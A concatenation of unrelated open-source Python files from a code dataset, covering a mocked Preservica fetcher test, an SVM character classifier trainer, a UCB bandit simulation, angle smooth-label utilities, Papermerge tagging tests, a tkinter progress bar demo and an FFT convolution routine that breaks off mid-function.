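#
#     if __name__ == '__main__':
#         # ... perform initialisation (bind sockets, load config) ...
#         ready()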
|
StarcoderdataPython
|
11365190
|
# -*- coding: utf-8 -*-
from unittest import TestCase
from mypretty import httpretty
# import httpretty
import harvester.fetcher as fetcher
from test.utils import LogOverrideMixin
from test.utils import DIR_FIXTURES
import logging
logger = logging.getLogger(__name__)
class PreservicaFetcherTestCase(LogOverrideMixin, TestCase):
@httpretty.activate
def testPreservicaFetch(self):
httpretty.register_uri(
httpretty.GET,
'https://us.preservica.com/api/entity/v6.0/structural-objects/eb2416ec-ac1e-4e5e-baee-84e3371c03e9/children',
responses=[
httpretty.Response(
body=open(DIR_FIXTURES + '/preservica-page-1.xml').read())
])
httpretty.register_uri(
httpretty.GET,
'https://us.preservica.com/api/entity/v6.0/structural-objects/eb2416ec-ac1e-4e5e-baee-84e3371c03e9/children/?start=100&max=100',
match_querystring=True,
responses=[
httpretty.Response(
body=open(DIR_FIXTURES + '/preservica-page-2.xml').read())
])
httpretty.register_uri(
httpretty.GET,
'https://us.preservica.com/api/entity/v6.0/information-objects/8c81f065-b6e4-457e-8b76-d18176f74bee',
responses=[
httpretty.Response(
body=open(DIR_FIXTURES + '/preservica-child-1.xml').read())
])
httpretty.register_uri(
httpretty.GET,
'https://us.preservica.com/api/entity/v6.0/information-objects/8c81f065-b6e4-457e-8b76-d18176f74bee/metadata/37db4583-8e8e-4778-ac90-ad443664c5cb',
responses=[
httpretty.Response(
body=open(DIR_FIXTURES + '/preservica-child-2.xml').read())
])
httpretty.register_uri(
httpretty.GET,
'https://us.preservica.com/api/entity/v6.0/information-objects/9501e09f-1ae8-4abc-a9ec-6c705ff8fdbe',
responses=[
httpretty.Response(
body=open(DIR_FIXTURES + '/preservica-child-3.xml').read())
])
httpretty.register_uri(
httpretty.GET,
'https://us.preservica.com/api/entity/v6.0/information-objects/9501e09f-1ae8-4abc-a9ec-6c705ff8fdbe/metadata/ec5c46e5-443e-4b6d-81b9-ec2a5252a50c',
responses=[
httpretty.Response(
body=open(DIR_FIXTURES + '/preservica-child-4.xml').read())
])
h = fetcher.PreservicaFetcher(
'https://oakland.access.preservica.com/v6.0/uncategorized/SO_eb2416ec-ac1e-4e5e-baee-84e3371c03e9/',
'usr, pwd')
docs = []
d = h.next()
docs.extend(d)
logger.error(docs[0])
for d in h:
docs.extend(d)
self.assertEqual(len(docs), 17)
# Copyright © 2016, Regents of the University of California
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the University of California nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
|
StarcoderdataPython
|
11318390
|
from __future__ import annotations
from mentormatch.api.applicant.applicant_abc import Applicant
from mentormatch.utils import ApplicantType
from typing import TYPE_CHECKING, Dict
if TYPE_CHECKING:
from mentormatch.api.sorter.sorter_abc import Sorter
class Mentor(Applicant):
applicant_type = ApplicantType.MENTOR
def __init__(self, applicant_dict: Dict, sorter: Sorter):
super().__init__(
applicant_dict=applicant_dict,
sorter=sorter,
)
self.max_pair_count = int(applicant_dict['max_mentee_count'])
|
StarcoderdataPython
|
8060585
|
<reponame>AmudhanManisekaran/AI-Cop
import os
import numpy as np
from sklearn.svm import SVC
from sklearn.model_selection import cross_val_score
from sklearn.externals import joblib
from skimage.io import imread
from skimage.filters import threshold_otsu
# letters = [
# '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D',
# 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',
# 'U', 'V', 'W', 'X', 'Y', 'Z'
# ]
letters = [
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D',
'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T',
'U', 'V', 'W', 'X', 'Y', 'Z'
]
# numbers = [ 0, 1, 2, 5 ,6, 10, 17, 18 ,25, 26, 29, 30, 33, 37, 38 ,45, 49, 50, 57, 58, 65, 66, 68, 81, 153, 154,
# 155, 156, 157, 158, 161, 166, 168, 169, 170, 173, 174, 175, 176, 177, 178, 181, 182, 185, 186, 187, 189,
# 472, 489, 490, 491, 492, 546, 726, 737, 738, 773, 774, 946, 948, 954, 962, 966, 974, 977, 982, 986, 1010]
# letters = [
# '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D',
# 'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T',
# 'U', 'V', 'W', 'X', 'Y', 'Z'
# ]
# folders = [ "Sample001","Sample002","Sample003","Sample004","Sample005","Sample006",
# "Sample007","Sample008","Sample009","Sample010","Sample011","Sample012",
# "Sample013","Sample014","Sample015","Sample016","Sample017","Sample018",
# "Sample019","Sample020","Sample021","Sample022","Sample023","Sample024",
# "Sample025","Sample26","Sample27","Sample028","Sample029","Sample030",
# "Sample031","Sample032","Sample033","Sample034","Sample035","Sample036",]
# numbers = [ "001","002","003","004","005","006",
# "007","008","009","010","011","012",
# "013","014","015","016","017","018",
# "019","020","021","022","023","024",
# "025","026","027","028","029","030",
# "031","032","033","034","035","036",]
def read_training_data(training_directory):
image_data = []
target_data = []
for each_letter in letters:
# for each_number in numbers:
for each in range(1,78):
# image_path = os.path.join(training_directory, each_letter, each_letter + '_' + str(each) + '.jpg')
image_path = os.path.join(training_directory, each_letter , ' (' + str(each) + ').jpg')
# image_path = os.path.join(training_directory, 'set' + each_number, 'img' + each_number + ' (' + str(each) + ').jpg')
# read each image of each character
img_details = imread(image_path, as_grey=True)
# converts each character image to binary image
binary_image = img_details < threshold_otsu(img_details)
# binary_image = img_details < img_details
# the 2D array of each image is flattened because the machine learning
# classifier requires that each sample is a 1D array
# therefore the 20*20 image becomes 1*400
# in machine learning terms that's 400 features with each pixel
# representing a feature
flat_bin_image = binary_image.reshape(-1)
image_data.append(flat_bin_image)
target_data.append(each_letter)
# target_data.append(each_number)
return (np.array(image_data), np.array(target_data))
def cross_validation(model, num_of_fold, train_data, train_label):
# this uses the concept of cross validation to measure the accuracy
# of a model, the num_of_fold determines the type of validation
# e.g if num_of_fold is 4, then we are performing a 4-fold cross validation
# it will divide the dataset into 4 and use 1/4 of it for testing
# and the remaining 3/4 for the training
accuracy_result = cross_val_score(model, train_data, train_label,
cv=num_of_fold)
print("Cross Validation Result for ", str(num_of_fold), " -fold")
print(accuracy_result * 100)
current_dir = os.path.dirname(os.path.realpath(__file__))
# training_dataset_dir = os.path.join(current_dir, 'train')
training_dataset_dir = os.path.join(current_dir, 'train_new_78')
# training_dataset_dir = os.path.join(current_dir, 'fonts')
image_data, target_data = read_training_data(training_dataset_dir)
# the kernel can be 'linear', 'poly' or 'rbf'
# the probability was set to True so as to show
# how sure the model is of it's prediction
svc_model = SVC(kernel='linear', probability=True)
cross_validation(svc_model, 4, image_data, target_data)
# let's train the model with all the input data
svc_model.fit(image_data, target_data)
# we will use the joblib module to persist the model
# into files. This means that the next time we need to
# predict, we don't need to train the model again
save_directory = os.path.join(current_dir, 'models/svc/')
if not os.path.exists(save_directory):
os.makedirs(save_directory)
joblib.dump(svc_model, save_directory+'/svc.pkl')
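# Illustrative follow-up (not part of the original script; the variable names
# reuse the conventions above): the persisted classifier can be reloaded later
# to predict a single flattened 20x20 binary character image, e.g.
#
#     model = joblib.load(save_directory + '/svc.pkl')
#     prediction = model.predict(flat_bin_image.reshape(1, -1))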
|
StarcoderdataPython
|
12816628
|
<filename>src/UCB.py<gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
class UCB:
def __init__(self, avg: np.ndarray):
self.true_means = avg # true means of the arms
self.num_arms = avg.size # num arms (k)
self.best_arm = int(np.argmax(self.true_means)) # True best arm
# sort = np.sort(self.true_means)[::-1]
# self.delta_min = sort[0] - sort[1]
# self.C = 1
self.time = 0
self.regret = []
self.emp_means = np.zeros_like(self.true_means) # empirical means of arms \hat{\mu_j}
self.num_pulls = np.zeros_like(self.true_means) # number of times that arm i has been pulled T_j
self.ucb_arr = 1e5 * np.ones_like(self.true_means) # Upper confidence bounds i.e. U_j
self.arm_ix = None
def restart(self):
# Reset counters
self.time = 0
self.regret = []
self.emp_means = np.zeros_like(self.true_means)
self.num_pulls = np.zeros_like(self.true_means)
self.ucb_arr = 1e5 * np.ones_like(self.true_means)
self.arm_ix = None
def get_best_arm(self):
# For each time index, find the best arm according to UCB
return np.argmax(self.ucb_arr)
def update_ucb(self):
f = 1 + self.time * (np.log(self.time + 1) ** 2)
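        # UCB index: empirical mean plus an exploration bonus sqrt(2*log(f)/n_j)
        # that shrinks as an arm is pulled more often; f grows roughly like
        # t*log(t)^2 so the confidence width stays valid as time increases.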
for j in range(self.num_arms):
# So that T[j-1] is not 0 ~ div by zero error else
nj = 1 if self.num_pulls[j] == 0 else self.num_pulls[j]
self.ucb_arr[j] = self.emp_means[j] + np.sqrt((2 * np.log(f)) / nj)
def update_stats(self, rew_vec):
# genie plays best arm
genie_rew = rew_vec[self.best_arm]
player_rew = rew_vec[self.arm_ix]
self.regret.append((genie_rew - player_rew))
ni = self.num_pulls[self.arm_ix]
self.emp_means[self.arm_ix] = self.emp_means[self.arm_ix] * (ni / (ni + 1)) + player_rew / (ni + 1)
self.num_pulls[self.arm_ix] += 1
self.time += 1
def get_reward(self):
return self.true_means + np.random.normal(0, 1, np.shape(self.true_means))
def iterate(self):
# if self.time < self.num_arms:
# # So that T[j-1] is not 0 ~ div by zero error else
# self.arm_ix = self.time
# else:
self.update_ucb()
self.arm_ix = self.get_best_arm()
rew_vec = self.get_reward()
self.update_stats(rew_vec=rew_vec)
def run(avg, iterations, num_repeat):
regret = np.zeros((num_repeat, iterations))
ucb = UCB(avg=avg)
for j in range(num_repeat):
for t in range(iterations):
ucb.iterate()
# calculate cumulative regret
regret[j, :] = np.cumsum(np.asarray(ucb.regret))
ucb.restart()
return regret
if __name__ == '__main__':
mu = np.asarray([0.8, 0.96, 0.7, 0.5, 0.4, 0.3])
num_iter, num_inst = int(5e4), 30
reg = run(avg=mu,
iterations=num_iter,
num_repeat=num_inst)
mean_runs = np.mean(reg, axis=0)
std_runs = np.std(reg, axis=0)
UB = mean_runs + 1 * std_runs
LB = mean_runs - 1 * std_runs
x = np.arange(len(mean_runs))
plt.plot(x, mean_runs, color='b')
# plt.fill_between(x, LB, UB, alpha=0.3, linewidth=0.5, color='b')
plt.xlabel('Time (Log Scale)', fontsize=10)
plt.ylabel('Cumulative Regret with UCB', fontsize=10)
plt.xscale('log')
plt.grid(True, which='both', linestyle='--')
plt.show()
|
StarcoderdataPython
|
1959680
|
<gh_stars>1-10
# -*- coding:utf-8 -*-
# Author: <NAME> <<EMAIL>>, <<EMAIL>>
# License: Apache-2.0 license
# Copyright (c) SJTU. ALL rights reserved.
from __future__ import absolute_import, division, print_function
import numpy as np
import math
def gaussian_label(label, num_class, u=0, sig=4.0):
"""
Get gaussian label
:param label: angle_label/omega
:param num_class: angle_range/omega
:param u: mean
:param sig: window radius
:return: gaussian label
"""
x = np.array(range(math.floor(-num_class/2), math.ceil(num_class/2), 1))
if num_class % 2 != 0:
x = x[:-1]
y_sig = np.exp(-(x - u) ** 2 / (2 * sig ** 2))
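    # circularly shift the centered window so that its peak lands on index `label`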
return np.concatenate([y_sig[math.ceil(num_class/2)-label:],
y_sig[:math.ceil(num_class/2)-label]], axis=0)
def rectangular_label(label, num_class, radius=4):
"""
Get rectangular label
:param label: angle_label/omega
:param num_class: angle_range/omega
:param radius: window radius
:return: rectangular label
"""
x = np.zeros([num_class])
x[:radius+1] = 1
x[-radius:] = 1
y_sig = np.concatenate([x[-label:], x[:-label]], axis=0)
return y_sig
def pulse_label(label, num_class):
"""
Get pulse label
:param label: angle_label/omega
:param num_class: angle_range/omega
:return: pulse label
"""
x = np.zeros([num_class])
x[label] = 1
return x
def triangle_label(label, num_class, radius=4):
"""
Get triangle label
:param label: angle_label/omega
:param num_class: angle_range/omega
:param radius: window radius
:return: triangle label
"""
y_sig = np.zeros([num_class])
x = np.array(range(radius+1))
y = -1/(radius+1) * x + 1
y_sig[:radius+1] = y
y_sig[-radius:] = y[-1:0:-1]
return np.concatenate([y_sig[-label:], y_sig[:-label]], axis=0)
def get_all_smooth_label(num_label, label_type=0, radius=4):
all_smooth_label = []
if label_type == 0:
for i in range(num_label):
all_smooth_label.append(gaussian_label(i, num_label, sig=radius))
elif label_type == 1:
for i in range(num_label):
all_smooth_label.append(rectangular_label(i, num_label, radius=radius))
elif label_type == 2:
for i in range(num_label):
all_smooth_label.append(pulse_label(i, num_label))
elif label_type == 3:
for i in range(num_label):
all_smooth_label.append(triangle_label(i, num_label, radius=radius))
else:
raise Exception('Only support gaussian, rectangular, triangle and pulse label')
return np.array(all_smooth_label)
def angle_smooth_label(angle_label, angle_range=90, label_type=0, radius=4, omega=1):
"""
:param angle_label: angle label, range in [-90,0) or [-180, 0)
:param angle_range: 90 or 180
:param label_type: 0: gaussian label, 1: rectangular label, 2: pulse label, 3: triangle label
:param radius: window radius
:param omega: angle discretization granularity
:return:
**Circular Smooth Label:**
Proposed by `"<NAME> al. Arbitrary-Oriented Object Detection with Circular Smooth Label. ECCV 2020."
<https://link.springer.com/chapter/10.1007/978-3-030-58598-3_40>`_
.. image:: ../../images/csl.jpg
"""
assert angle_range % omega == 0, 'wrong omega'
angle_range /= omega
angle_label /= omega
angle_label = np.array(-np.round(angle_label), np.int32)
all_smooth_label = get_all_smooth_label(int(angle_range), label_type, radius)
inx = angle_label == angle_range
angle_label[inx] = angle_range - 1
smooth_label = all_smooth_label[angle_label]
return np.array(smooth_label, np.float32)
if __name__ == '__main__':
import matplotlib.pyplot as plt
# angle_label = np.array([-89.9, -45.2, -0.3, -1.9])
# smooth_label = angle_smooth_label(angle_label)
# y_sig = triangle_label(30, 180, radius=8)
y_sig = gaussian_label(180, 180, sig=6)
# y_sig = pulse_label(40, 180)
# y_sig = triangle_label(3, 180, radius=1)
x = np.array(range(0, 180, 1))
plt.plot(x, y_sig, "r-", linewidth=2)
plt.grid(True)
plt.show()
print(y_sig)
print(y_sig.shape)
|
StarcoderdataPython
|
11358513
|
<filename>papermerge/test/test_tags.py
from pathlib import Path
from django.test import TestCase
from papermerge.core.models import (
Document,
Folder,
Tag
)
from papermerge.test.utils import create_root_user
# points to papermerge.testing folder
BASE_DIR = Path(__file__).parent
class TestDocument(TestCase):
def setUp(self):
self.user = create_root_user()
def test_basic_document_tagging(self):
doc = Document.create_document(
title="document_c",
file_name="document_c.pdf",
size='1212',
lang='DEU',
user=self.user,
page_count=5,
)
doc.save()
# associate "invoice" and "paid" tags
# boths tags belong to self.user
doc.tags.add(
"invoice",
"paid",
tag_kwargs={"user": self.user}
)
# If you’re filtering on multiple tags, it’s very common to get
# duplicate results,
# because of the way relational databases work. Often
# you’ll want to make use of the distinct() method on QuerySets.
found_docs = Document.objects.filter(
tags__name__in=["paid", "invoice"]
).distinct()
self.assertEquals(
found_docs.count(),
1
)
self.assertEquals(
found_docs.first().title,
"document_c"
)
def test_restore_multiple_tags(self):
"""
Given a list of dictionaries with tag
attributes - add those tags to the document
(eventually create core.models.Tag instances).
Keep in mind that tag instances need to belong to same user as the
document owner.
This scenario is used in restore script (restore from backup).
"""
tag_attributes = [
{
"bg_color": "#ff1f1f",
"fg_color": "#ffffff",
"name": "important",
"description": "",
"pinned": True
},
{
"bg_color": "#c41fff",
"fg_color": "#FFFFFF",
"name": "receipts",
"description": None,
"pinned": False
}
]
doc = Document.create_document(
title="document_c",
file_name="document_c.pdf",
size='1212',
lang='DEU',
user=self.user,
page_count=5,
)
doc.save()
for attrs in tag_attributes:
attrs['user'] = self.user
tag = Tag.objects.create(**attrs)
doc.tags.add(tag)
doc.refresh_from_db()
self.assertEquals(
set([tag.name for tag in doc.tags.all()]),
{"receipts", "important"}
)
def test_basic_folder_tagging(self):
folder = Folder.objects.create(
title="Markus",
user=self.user
)
folder.tags.add(
"invoices",
tag_kwargs={"user": self.user}
)
found_folders = Folder.objects.filter(
tags__name__in=["invoices"]
)
self.assertEquals(
found_folders.count(),
1
)
self.assertEquals(
found_folders.first().title,
"Markus"
)
|
StarcoderdataPython
|
5040017
|
<filename>2_Python Advanced/7_Gui/21_progressBar.py
# -*- coding: utf-8 -*-
"""
Created on Thu May 31 23:57:18 2018
@author: SilverDoe
"""
from tkinter import *
from tkinter.ttk import Progressbar
from tkinter import ttk
window = Tk()
window.title("Welcome to LikeGeeks app")
window.geometry('350x200')
style = ttk.Style()
style.theme_use('default')
style.configure("black.Horizontal.TProgressbar", background='black')
bar = Progressbar(window, length=200, style='black.Horizontal.TProgressbar')
bar['value'] = 70
bar.grid(column=0, row=0)
window.mainloop()
|
StarcoderdataPython
|
8037081
|
from .dicts import JSONDecodeError
from .dicts import JsonDict
from .dicts import ReadOnlyJsonDict
from .exceptions import DataIntegrityError
from .exceptions import KeyDoesExistError
from .exceptions import KeyDoesNotExistError
from .exceptions import PeerDoesExistError
from .exceptions import PeerDoesNotExistError
from .exceptions import SettingDoesExistError
from .exceptions import SettingDoesNotExistError
from .exceptions import SiteDoesExistError
from .exceptions import SiteDoesNotExistError
from .exceptions import WireguardNotFoundError
from .list import BasicList
from .result import Message
from .result import MessageContent
from .result import MESSAGE_LEVEL
from .result import Result
from .result import ResultList
from .result import DataIntegrityMessage
from .result import DataIntegrityResult
from .peers import Keys
from .peers import PeerItems
from .peers import Peers
from .peers import RedirectAllTraffic
from .settings import Settings
from .sites import SiteItems
from .sites import Sites
from .tables import CONNECTION_TABLE_MESSAGE_TYPE
from .tables import ConnectionTable
from .tables import ConnectionTableMessage
from .tables import ConnectionTableMessageContent
__all__ = [
"MESSAGE_LEVEL",
"BasicList",
"CONNECTION_TABLE_MESSAGE_TYPE",
"ConnectionTable",
"ConnectionTableMessage",
"ConnectionTableMessageContent",
"DataIntegrityError",
"DataIntegrityMessage",
"DataIntegrityResult",
"JSONDecodeError",
"JsonDict",
"Keys",
"KeyDoesExistError",
"KeyDoesNotExistError",
"Message",
"MessageContent",
"PeerItems",
"PeerDoesExistError",
"PeerDoesNotExistError",
"Peers",
"ReadOnlyJsonDict",
"RedirectAllTraffic",
"Result",
"ResultList",
"SettingDoesExistError",
"SettingDoesNotExistError",
"Settings",
"SiteItems",
"SiteDoesExistError",
"SiteDoesNotExistError",
"Sites",
"WireguardNotFoundError",
]
|
StarcoderdataPython
|
6597120
|
#it includes part of the code of the image_registration repository
"""Copyright (c) 2012 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
#from convolve_nd import convolvend as convolve
import warnings
import itertools
from astropy.tests.helper import pytest
try:
import fftw3
has_fftw = True
def fftwn(array, nthreads=1):
array = array.astype('complex').copy()
outarray = array.copy()
fft_forward = fftw3.Plan(array, outarray, direction='forward',
flags=['estimate'], nthreads=nthreads)
fft_forward.execute()
return outarray
def ifftwn(array, nthreads=1):
array = array.astype('complex').copy()
outarray = array.copy()
fft_backward = fftw3.Plan(array, outarray, direction='backward',
flags=['estimate'], nthreads=nthreads)
fft_backward.execute()
return outarray / np.size(array)
except ImportError:
fftn = np.fft.fftn
ifftn = np.fft.ifftn
has_fftw = False
# I performed some fft speed tests and found that scipy is slower than numpy
# http://code.google.com/p/agpy/source/browse/trunk/tests/test_ffts.py However,
# the speed varied on machines - YMMV. If someone finds that scipy's fft is
# faster, we should add that as an option here... not sure how exactly
def get_ffts(nthreads=1, use_numpy_fft=not has_fftw):
"""
Returns fftn,ifftn using either numpy's fft or fftw
"""
if has_fftw and not use_numpy_fft:
def fftn(*args, **kwargs):
return fftwn(*args, nthreads=nthreads, **kwargs)
def ifftn(*args, **kwargs):
return ifftwn(*args, nthreads=nthreads, **kwargs)
elif use_numpy_fft:
fftn = np.fft.fftn
ifftn = np.fft.ifftn
else:
# yes, this is redundant, but I feel like there could be a third option...
fftn = np.fft.fftn
ifftn = np.fft.ifftn
return fftn,ifftn
#def convolvend(array, kernel, boundary='fill', fill_value=0,
def convolve(array, kernel, boundary='fill', fill_value=0,
crop=True, return_fft=False, fftshift=True, fft_pad=True,
psf_pad=False, interpolate_nan=False, quiet=False,
ignore_edge_zeros=False, min_wt=0.0, normalize_kernel=False,
use_numpy_fft=not has_fftw, nthreads=1):
"""
Convolve an ndarray with an nd-kernel. Returns a convolved image with shape =
array.shape. Assumes image & kernel are centered.
Parameters
----------
array: `numpy.ndarray`
Array to be convolved with *kernel*
kernel: `numpy.ndarray`
Will be normalized if *normalize_kernel* is set. Assumed to be
centered (i.e., shifts may result if your kernel is asymmetric)
Options
-------
boundary: str, optional
A flag indicating how to handle boundaries:
* 'fill' : set values outside the array boundary to fill_value
(default)
* 'wrap' : periodic boundary
interpolate_nan: bool
attempts to re-weight assuming NAN values are meant to be ignored, not
treated as zero. If this is off, all NaN values will be treated as
zero.
ignore_edge_zeros: bool
Ignore the zero-pad-created zeros. This will effectively decrease
the kernel area on the edges but will not re-normalize the kernel.
This parameter may result in 'edge-brightening' effects if you're using
a normalized kernel
min_wt: float
If ignoring NANs/zeros, force all grid points with a weight less than
this value to NAN (the weight of a grid point with *no* ignored
neighbors is 1.0).
If `min_wt` == 0.0, then all zero-weight points will be set to zero
instead of NAN (which they would be otherwise, because 1/0 = nan).
See the examples below
normalize_kernel: function or boolean
if specified, function to divide kernel by to normalize it. e.g.,
normalize_kernel=np.sum means that kernel will be modified to be:
kernel = kernel / np.sum(kernel). If True, defaults to
normalize_kernel = np.sum
Advanced options
----------------
fft_pad: bool
Default on. Zero-pad image to the nearest 2^n
psf_pad: bool
Default off. Zero-pad image to be at least the sum of the image sizes
(in order to avoid edge-wrapping when smoothing)
crop: bool
Default on. Return an image of the size of the largest input image.
If the images are asymmetric in opposite directions, will return the
largest image in both directions.
For example, if an input image has shape [100,3] but a kernel with shape
[6,6] is used, the output will be [100,6].
return_fft: bool
Return the fft(image)*fft(kernel) instead of the convolution (which is
ifft(fft(image)*fft(kernel))). Useful for making PSDs.
fftshift: bool
If return_fft on, will shift & crop image to appropriate dimensions
nthreads: int
if fftw3 is installed, can specify the number of threads to allow FFTs
to use. Probably only helpful for large arrays
use_numpy_fft: bool
Force the code to use the numpy FFTs instead of FFTW even if FFTW is
installed
Returns
-------
default: `array` convolved with `kernel`
if return_fft: fft(`array`) * fft(`kernel`)
* if fftshift: Determines whether the fft will be shifted before
returning
if not(`crop`) : Returns the image, but with the fft-padded size
instead of the input size
Examples
--------
>>> convolvend([1,0,3],[1,1,1])
array([ 1., 4., 3.])
>>> convolvend([1,np.nan,3],[1,1,1],quiet=True)
array([ 1., 4., 3.])
>>> convolvend([1,0,3],[0,1,0])
array([ 1., 0., 3.])
>>> convolvend([1,2,3],[1])
array([ 1., 2., 3.])
>>> convolvend([1,np.nan,3],[0,1,0], interpolate_nan=True)
array([ 1., 0., 3.])
>>> convolvend([1,np.nan,3],[0,1,0], interpolate_nan=True, min_wt=1e-8)
array([ 1., nan, 3.])
>>> convolvend([1,np.nan,3],[1,1,1], interpolate_nan=True)
array([ 1., 4., 3.])
>>> convolvend([1,np.nan,3],[1,1,1], interpolate_nan=True, normalize_kernel=True, ignore_edge_zeros=True)
array([ 1., 2., 3.])
"""
# Checking copied from convolve.py - however, since FFTs have real &
# complex components, we change the types. Only the real part will be
# returned!
# Check that the arguments are lists or Numpy arrays
array = np.asarray(array, dtype=np.complex)
kernel = np.asarray(kernel, dtype=np.complex)
# Check that the number of dimensions is compatible
#in principle i do not need that because i check it beforehand
if array.ndim != kernel.ndim:
        raise Exception('array and kernel have differing number of '
                        'dimensions')
# store the dtype for conversion back later
array_dtype = array.dtype
# turn the arrays into 'complex' arrays
if array.dtype.kind != 'c':
array = array.astype(np.complex)
if kernel.dtype.kind != 'c':
kernel = kernel.astype(np.complex)
# mask catching - masks must be turned into NaNs for use later
if np.ma.is_masked(array):
mask = array.mask
array = np.array(array)
array[mask] = np.nan
if np.ma.is_masked(kernel):
mask = kernel.mask
kernel = np.array(kernel)
kernel[mask] = np.nan
# replace fftn if has_fftw so that nthreads can be passed
global fftn, ifftn
if has_fftw and not use_numpy_fft:
def fftn(*args, **kwargs):
return fftwn(*args, nthreads=nthreads, **kwargs)
def ifftn(*args, **kwargs):
return ifftwn(*args, nthreads=nthreads, **kwargs)
elif use_numpy_fft:
fftn = np.fft.fftn
ifftn = np.fft.ifftn
# NAN catching
nanmaskarray = (array != array)
array[nanmaskarray] = 0
nanmaskkernel = (kernel != kernel)
kernel[nanmaskkernel] = 0
if ((nanmaskarray.sum() > 0 or nanmaskkernel.sum() > 0) and not interpolate_nan
and not quiet):
warnings.warn("NOT ignoring nan values even though they are present" +
" (they are treated as 0)")
if normalize_kernel is True:
kernel = kernel / kernel.sum()
kernel_is_normalized = True
elif normalize_kernel:
# try this. If a function is not passed, the code will just crash... I
# think type checking would be better but PEPs say otherwise...
kernel = kernel / normalize_kernel(kernel)
kernel_is_normalized = True
else:
if np.abs(kernel.sum() - 1) < 1e-8:
kernel_is_normalized = True
else:
kernel_is_normalized = False
if boundary is None:
WARNING = ("The convolvend version of boundary=None is equivalent" +
" to the convolve boundary='fill'. There is no FFT " +
" equivalent to convolve's zero-if-kernel-leaves-boundary" )
warnings.warn(WARNING)
psf_pad = True
elif boundary == 'fill':
# create a boundary region at least as large as the kernel
psf_pad = True
elif boundary == 'wrap':
psf_pad = False
fft_pad = False
fill_value = 0 # force zero; it should not be used
elif boundary == 'extend':
raise NotImplementedError("The 'extend' option is not implemented " +
"for fft-based convolution")
arrayshape = array.shape
kernshape = kernel.shape
ndim = len(array.shape)
if ndim != len(kernshape):
raise ValueError("Image and kernel must " +
"have same number of dimensions")
# find ideal size (power of 2) for fft.
# Can add shapes because they are tuples
if fft_pad:
if psf_pad:
# add the dimensions and then take the max (bigger)
fsize = 2**np.ceil(np.log2(
np.max(np.array(arrayshape) + np.array(kernshape))))
else:
# add the shape lists (max of a list of length 4) (smaller)
# also makes the shapes square
fsize = 2**np.ceil(np.log2(np.max(arrayshape+kernshape)))
newshape = np.array([fsize for ii in range(ndim)])
else:
if psf_pad:
# just add the biggest dimensions
newshape = np.array(arrayshape)+np.array(kernshape)
else:
newshape = np.array([np.max([imsh, kernsh])
for imsh, kernsh in zip(arrayshape, kernshape)])
# separate each dimension by the padding size... this is to determine the
# appropriate slice size to get back to the input dimensions
arrayslices = []
kernslices = []
for ii, (newdimsize, arraydimsize, kerndimsize) in enumerate(zip(newshape, arrayshape, kernshape)):
center = newdimsize - (newdimsize+1)//2
arrayslices += [slice(center - arraydimsize//2,
center + (arraydimsize+1)//2)]
kernslices += [slice(center - kerndimsize//2,
center + (kerndimsize+1)//2)]
bigarray = np.ones(newshape, dtype=np.complex128) * fill_value
bigkernel = np.zeros(newshape, dtype=np.complex128)
bigarray[arrayslices] = array
bigkernel[kernslices] = kernel
arrayfft = fftn(bigarray)
# need to shift the kernel so that, e.g., [0,0,1,0] -> [1,0,0,0] = unity
kernfft = fftn(np.fft.ifftshift(bigkernel))
fftmult = arrayfft*kernfft
if (interpolate_nan or ignore_edge_zeros) and kernel_is_normalized:
if ignore_edge_zeros:
bigimwt = np.zeros(newshape, dtype=np.complex128)
else:
bigimwt = np.ones(newshape, dtype=np.complex128)
bigimwt[arrayslices] = 1.0-nanmaskarray*interpolate_nan
wtfft = fftn(bigimwt)
# I think this one HAS to be normalized (i.e., the weights can't be
# computed with a non-normalized kernel)
